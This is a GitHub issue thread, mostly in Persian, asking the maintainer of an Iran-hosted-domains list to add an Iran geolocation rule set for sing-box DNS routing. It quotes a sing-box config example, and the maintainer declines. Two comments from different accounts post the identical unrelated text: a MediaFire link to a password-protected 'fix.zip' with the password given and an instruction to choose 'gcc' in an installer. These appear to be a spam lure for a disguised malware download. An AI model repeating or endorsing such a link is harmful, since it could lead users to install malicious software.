### ISSUE TITLE
Support for geolocation!ir

### ISSUE THREAD

**Issue by fsheidaiee** [bootmortis/iran-hosted-domains#237]
### Description

سلام
از نسخه 1.9 به بالاتر برای sing-box برای عدم نشت dns توصیه شده که از address filter استفاده بشه ملاحظه بفرمایید.
https://sing-box.sagernet.org/changelog/#190

در client example یک نمونه تنظیمات بدون dns leak گذاشته که فقط برای کاربران چینی قابلیت اجرا داره.
ملاحظه کنید
https://sing-box.sagernet.org/manual/proxy/client/#traffic-bypass-usage-for-chinese-users

{
"dns": {
"servers": [
{
"tag": "google",
"address": "tls://8.8.8.8"
},
{
"tag": "local",
"address": "https://223.5.5.5/dns-query",
"detour": "direct"
}
],
"rules": [
{
"outbound": "any",
"server": "local"
},
{
"clash_mode": "Direct",
"server": "local"
},
{
"clash_mode": "Global",
"server": "google"
},
{
"rule_set": "geosite-geolocation-cn",
"server": "local"
},
{
"type": "logical",
"mode": "and",
"rules": [
{
"rule_set": "geosite-geolocation-!cn",
"invert": true
},
{
"rule_set": "geoip-cn"
}
],
"server": "google",
"client_subnet": "114.114.114.114/24" // Any China client IP address
}
]
},
"route": {
"rule_set": [
{
"type": "remote",
"tag": "geosite-geolocation-cn",
"format": "binary",
"url": "https://raw.githubusercontent.com/SagerNet/sing-geosite/rule-set/geosite-geolocation-cn.srs"
},
{
"type": "remote",
"tag": "geosite-geolocation-!cn",
"format": "binary",
"url": "https://raw.githubusercontent.com/SagerNet/sing-geosite/rule-set/geosite-geolocation-!cn.srs"
},
{
"type": "remote",
"tag": "geoip-cn",
"format": "binary",
"url": "https://raw.githubusercontent.com/SagerNet/sing-geoip/rule-set/geoip-cn.srs"
}
]
},
"experimental": {
"cache_file": {
"enabled": true,
"store_rdrc": true
},
"clash_api": {
"default_mode": "Enhanced"
}
}
}

geolocation!cn
منظور هر دامینی خارج از چینه
برای کاربران ایرانی هم لازمه که یک دیتابیس مناسب ایجاد و پشتیبانی بشه

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bootmortis** [comment]
قبلا بحث شده این مورد #50 #51 
تمرکز این مخزن صرفا بر روی دامنه‌های هاست شده در ایران هست.
برای اینکار بهتره مخزن جدیدی زده بشه که من در حال حاضر زمانش رو ندارم.

also related: https://github.com/v2fly/domain-list-community/pull/1672
